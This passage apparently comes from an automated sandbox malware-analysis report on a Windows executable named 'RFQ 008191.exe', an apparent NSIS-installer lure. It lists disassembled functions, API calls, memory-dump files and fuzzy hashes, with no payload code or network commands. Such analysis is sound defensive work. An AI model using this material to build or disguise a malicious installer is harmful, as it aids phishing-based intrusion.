                                                                    • Associated: 00000000.00000002.1330344837.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330545906.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_RFQ 008191.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
                                                                    • String ID: : Completed$N
                                                                    • API String ID: 3103080414-2140067464
                                                                    • Opcode ID: 4011bf91f23cdad070dcf702cd0082b1ea04741390be1e297b86103e4649bf75
                                                                    • Instruction ID: 9930e5d90db5dccbb26e86255d6156f8bb9eb7c4e216bd2cc4efdce7ef6c99e8
                                                                    • Opcode Fuzzy Hash: 4011bf91f23cdad070dcf702cd0082b1ea04741390be1e297b86103e4649bf75
                                                                    • Instruction Fuzzy Hash: 8E6180B1A00209BFDB10AF64DD85A6A7B69FB84354F00843AF605B62D0D7B8AD51DF98
                                                                    Function 00401000 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 125COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                                    • BeginPaint.USER32(?,?), ref: 00401047
                                                                    • GetClientRect.USER32(?,?), ref: 0040105B
                                                                    • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                                    • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                                                    • DeleteObject.GDI32(?), ref: 004010ED
                                                                    • CreateFontIndirectW.GDI32(?), ref: 00401105
                                                                    • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                                    • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                                    • SelectObject.GDI32(00000000,?), ref: 00401140
                                                                    • DrawTextW.USER32(00000000,00428A20,000000FF,00000010,00000820), ref: 00401156
                                                                    • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                                    • DeleteObject.GDI32(?), ref: 00401165
                                                                    • EndPaint.USER32(?,?), ref: 0040116E
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1330290654.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.1330272699.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330318442.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330545906.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_RFQ 008191.jbxd
                                                                    Similarity
                                                                    • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                    • String ID: F
                                                                    • API String ID: 941294808-1304234792
                                                                    • Opcode ID: fcc37e75e13d0dca8524aaa06a8ee829d240d30c68f9aadea354bd02ab1c226a
                                                                    • Instruction ID: d1034cbb9d528375343357a353c0022e70e8214492c202610c441178c5bfc5cd
                                                                    • Opcode Fuzzy Hash: fcc37e75e13d0dca8524aaa06a8ee829d240d30c68f9aadea354bd02ab1c226a
                                                                    • Instruction Fuzzy Hash: FC417B71800249AFCB058FA5DE459AFBBB9FF45314F00802EF592AA1A0CB74DA55DFA4
                                                                    Function 00406187 Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 130memorystringCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,?,00406322,?,?), ref: 004061C2
                                                                    • GetShortPathNameW.KERNEL32(?,004265A8,00000400), ref: 004061CB
                                                                      • Part of subcall function 00405F96: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,0040627B,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FA6
                                                                      • Part of subcall function 00405F96: lstrlenA.KERNEL32(00000000,?,00000000,0040627B,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FD8
                                                                    • GetShortPathNameW.KERNEL32(?,00426DA8,00000400), ref: 004061E8
                                                                    • wsprintfA.USER32 ref: 00406206
                                                                    • GetFileSize.KERNEL32(00000000,00000000,00426DA8,C0000000,00000004,00426DA8,?,?,?,?,?), ref: 00406241
                                                                    • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00406250
                                                                    • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00406288
                                                                    • SetFilePointer.KERNEL32(0040A580,00000000,00000000,00000000,00000000,004261A8,00000000,-0000000A,0040A580,00000000,[Rename],00000000,00000000,00000000), ref: 004062DE
                                                                    • GlobalFree.KERNEL32(00000000), ref: 004062EF
                                                                    • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 004062F6
                                                                      • Part of subcall function 00406031: GetFileAttributesW.KERNELBASE(00000003,004030E2,00437800,80000000,00000003), ref: 00406035
                                                                      • Part of subcall function 00406031: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00406057
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1330290654.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.1330272699.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330318442.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330545906.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_RFQ 008191.jbxd
                                                                    Similarity
                                                                    • API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
                                                                    • String ID: %ls=%ls$[Rename]
                                                                    • API String ID: 2171350718-461813615
                                                                    • Opcode ID: ad23c2c12608704314c1a1c2d98a70ea5e027cecb5ac03fef5858bd56b87dd73
                                                                    • Instruction ID: 01145b8f81eafc368a5e669bb7cc9688017d9d0d23ed4dcd6a8783cd941829b9
                                                                    • Opcode Fuzzy Hash: ad23c2c12608704314c1a1c2d98a70ea5e027cecb5ac03fef5858bd56b87dd73
                                                                    • Instruction Fuzzy Hash: DF31353060072ABBD6207B659D49F2B3A5CDF41754F12007EF902F62D2EA3D9C2586BD
                                                                    Function 004067EF Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 69COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • CharNextW.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\RFQ 008191.exe",771B3420,C:\Users\user~1\AppData\Local\Temp\,00000000,004034F7,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,00403806,?,00000008,0000000A,0000000C), ref: 00406852
                                                                    • CharNextW.USER32(?,?,?,00000000,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00406861
                                                                    • CharNextW.USER32(?,"C:\Users\user\Desktop\RFQ 008191.exe",771B3420,C:\Users\user~1\AppData\Local\Temp\,00000000,004034F7,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,00403806,?,00000008,0000000A,0000000C), ref: 00406866
                                                                    • CharPrevW.USER32(?,?,771B3420,C:\Users\user~1\AppData\Local\Temp\,00000000,004034F7,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,00403806,?,00000008,0000000A,0000000C), ref: 00406879
                                                                    Strings
                                                                    • *?|<>/":, xrefs: 00406841
                                                                    • "C:\Users\user\Desktop\RFQ 008191.exe", xrefs: 00406833
                                                                    • C:\Users\user~1\AppData\Local\Temp\, xrefs: 004067F0
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1330290654.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.1330272699.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330318442.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330545906.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_RFQ 008191.jbxd
                                                                    Similarity
                                                                    • API ID: Char$Next$Prev
                                                                    • String ID: "C:\Users\user\Desktop\RFQ 008191.exe"$*?|<>/":$C:\Users\user~1\AppData\Local\Temp\
                                                                    • API String ID: 589700163-3686559080
                                                                    • Opcode ID: d9890b2689dddc4776a4db6af1629ac80bd1bcc56ba6148264ccbff8cf15ab87
                                                                    • Instruction ID: 55fd55a6259970f18c414665dfb8d2eb8684f68ced2253b2c35ece4a8e009edc
                                                                    • Opcode Fuzzy Hash: d9890b2689dddc4776a4db6af1629ac80bd1bcc56ba6148264ccbff8cf15ab87
                                                                    • Instruction Fuzzy Hash: 0E11E61780221295DB303B15CC40ABB62E8EF54750F16C43FE999732C0E77C4C9286BD
                                                                    Function 00404527 Relevance: 12.1, APIs: 8, Instructions: 68COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetWindowLongW.USER32(?,000000EB), ref: 00404544
                                                                    • GetSysColor.USER32(00000000), ref: 00404582
                                                                    • SetTextColor.GDI32(?,00000000), ref: 0040458E
                                                                    • SetBkMode.GDI32(?,?), ref: 0040459A
                                                                    • GetSysColor.USER32(?), ref: 004045AD
                                                                    • SetBkColor.GDI32(?,?), ref: 004045BD
                                                                    • DeleteObject.GDI32(?), ref: 004045D7
                                                                    • CreateBrushIndirect.GDI32(?), ref: 004045E1
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1330290654.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.1330272699.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330318442.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330545906.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_RFQ 008191.jbxd
                                                                    Similarity
                                                                    • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                    • String ID:
                                                                    • API String ID: 2320649405-0
                                                                    • Opcode ID: 9dba601b91aff6ac4bf2e5f3eaee39d76022ea5146a5c84035e03d3d84c8d27c
                                                                    • Instruction ID: d41769c693a3b03867a7fa47e0dc02698e8003aaa16d7874add0ef0652afaaee
                                                                    • Opcode Fuzzy Hash: 9dba601b91aff6ac4bf2e5f3eaee39d76022ea5146a5c84035e03d3d84c8d27c
                                                                    • Instruction Fuzzy Hash: 5A2195B1500704BFCB349F39DD08A477BF8AF41714B00892EEA96A22E0DB38DA44CB54
                                                                    Function 00402711 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 153fileCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • ReadFile.KERNEL32(?,?,?,?), ref: 0040277D
                                                                    • MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 004027B8
                                                                    • SetFilePointer.KERNEL32(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 004027DB
                                                                    • MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 004027F1
                                                                      • Part of subcall function 00406112: SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 00406128
                                                                    • SetFilePointer.KERNEL32(?,?,?,00000001,?,?,00000002), ref: 0040289D
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1330290654.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.1330272699.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330318442.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330545906.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_RFQ 008191.jbxd
                                                                    Similarity
                                                                    • API ID: File$Pointer$ByteCharMultiWide$Read
                                                                    • String ID: 9
                                                                    • API String ID: 163830602-2366072709
                                                                    • Opcode ID: 91519286727b7715e667a28de049f7dc24ed8e1d9bfc14afdf41a8c3697f6d43
                                                                    • Instruction ID: 7b917313dc97d271e667d5624dbaf811d8953be2b726cd25112f37da0e7500b1
                                                                    • Opcode Fuzzy Hash: 91519286727b7715e667a28de049f7dc24ed8e1d9bfc14afdf41a8c3697f6d43
                                                                    • Instruction Fuzzy Hash: 35511E75D04119AADF20EFD4CA84AAEB779FF44304F14817BE501B62D0D7B89D828B58
                                                                    Function 00404E7B Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404E96
                                                                    • GetMessagePos.USER32 ref: 00404E9E
                                                                    • ScreenToClient.USER32(?,?), ref: 00404EB8
                                                                    • SendMessageW.USER32(?,00001111,00000000,?), ref: 00404ECA
                                                                    • SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404EF0
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1330290654.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.1330272699.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330318442.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330545906.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_RFQ 008191.jbxd
                                                                    Similarity
                                                                    • API ID: Message$Send$ClientScreen
                                                                    • String ID: f
                                                                    • API String ID: 41195575-1993550816
                                                                    • Opcode ID: 3b05e908374c5eb3ed0cc07743cf8bdf4b6f619b857b2f4ef42225a5e6fc1927
                                                                    • Instruction ID: 6d9709cdd774db07ceaeaaa3ef1e8ea5a4c7015a7cc254b2929396571b15d8ef
                                                                    • Opcode Fuzzy Hash: 3b05e908374c5eb3ed0cc07743cf8bdf4b6f619b857b2f4ef42225a5e6fc1927
                                                                    • Instruction Fuzzy Hash: 7E015E71900218BADB00DB94DD85BFEBBBCAF95B11F10412BBB51B61D0C7B49A418BA4
                                                                    Function 00401E73 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 43COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetDC.USER32(?), ref: 00401E76
                                                                    • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401E90
                                                                    • MulDiv.KERNEL32(00000000,00000000), ref: 00401E98
                                                                    • ReleaseDC.USER32(?,00000000), ref: 00401EA9
                                                                    • CreateFontIndirectW.GDI32(0040CDC8), ref: 00401EF8
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1330290654.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.1330272699.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330318442.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330545906.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_RFQ 008191.jbxd
                                                                    Similarity
                                                                    • API ID: CapsCreateDeviceFontIndirectRelease
                                                                    • String ID: Calibri
                                                                    • API String ID: 3808545654-1409258342
                                                                    • Opcode ID: ef63408107684041e4866229634915ac86451c59f948bd83cb9cb27aef798f6a
                                                                    • Instruction ID: 1d77b42acd886a27ae9f5cf53f8bcf428a8cf24ec4295262a5ba191a384267e2
                                                                    • Opcode Fuzzy Hash: ef63408107684041e4866229634915ac86451c59f948bd83cb9cb27aef798f6a
                                                                    • Instruction Fuzzy Hash: 9E01B171950250EFEB005BB4AE8AADD3FB0AF59300F10497AF142BA1E2CAB804049B2C
                                                                    Function 00402FB8 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40timeCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402FD6
                                                                    • MulDiv.KERNEL32(000C243A,00000064,000C243E), ref: 00403001
                                                                    • wsprintfW.USER32 ref: 00403011
                                                                    • SetWindowTextW.USER32(?,?), ref: 00403021
                                                                    • SetDlgItemTextW.USER32(?,00000406,?), ref: 00403033
                                                                    Strings
                                                                    • verifying installer: %d%%, xrefs: 0040300B
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1330290654.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.1330272699.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330318442.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330545906.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_RFQ 008191.jbxd
                                                                    Similarity
                                                                    • API ID: Text$ItemTimerWindowwsprintf
                                                                    • String ID: verifying installer: %d%%
                                                                    • API String ID: 1451636040-82062127
                                                                    • Opcode ID: 7c72eb226873640f15370cd8631d515f33e7e0e766319f11269e715f4bf9c46b
                                                                    • Instruction ID: 92b1fa929db6ad6423e495ae3c8b7d5051599f53ef0535b5d141126ce54988b0
                                                                    • Opcode Fuzzy Hash: 7c72eb226873640f15370cd8631d515f33e7e0e766319f11269e715f4bf9c46b
                                                                    • Instruction Fuzzy Hash: 41014F70640208BBEF209F60DD49FEE3B69BB04345F008039FA02A51D0DBB99A559F58
                                                                    Function 00402975 Relevance: 9.1, APIs: 6, Instructions: 91memoryfileCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 004029D6
                                                                    • GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 004029F2
                                                                    • GlobalFree.KERNEL32(?), ref: 00402A2B
                                                                    • GlobalFree.KERNEL32(00000000), ref: 00402A3E
                                                                    • CloseHandle.KERNEL32(?,?,?,?,?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 00402A5A
                                                                    • DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 00402A6D
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1330290654.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.1330272699.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330318442.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330545906.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_RFQ 008191.jbxd
                                                                    Similarity
                                                                    • API ID: Global$AllocFree$CloseDeleteFileHandle
                                                                    • String ID:
                                                                    • API String ID: 2667972263-0
                                                                    • Opcode ID: b07bb42a36a53ac2b652948ec131e563e6f6be8de0f89c4bf93d81cf64cebf1f
                                                                    • Instruction ID: 30dd54c89a4cddf194586c2a2fc5346a944fd6f702074eaf72055d986495362b
                                                                    • Opcode Fuzzy Hash: b07bb42a36a53ac2b652948ec131e563e6f6be8de0f89c4bf93d81cf64cebf1f
                                                                    • Instruction Fuzzy Hash: 0C31B171D00128BBCF21AFA5DE49D9E7E79AF44324F20423AF415762E1CB798D418FA8
                                                                    Function 00402ECE Relevance: 7.6, APIs: 5, Instructions: 84registryCOMMON
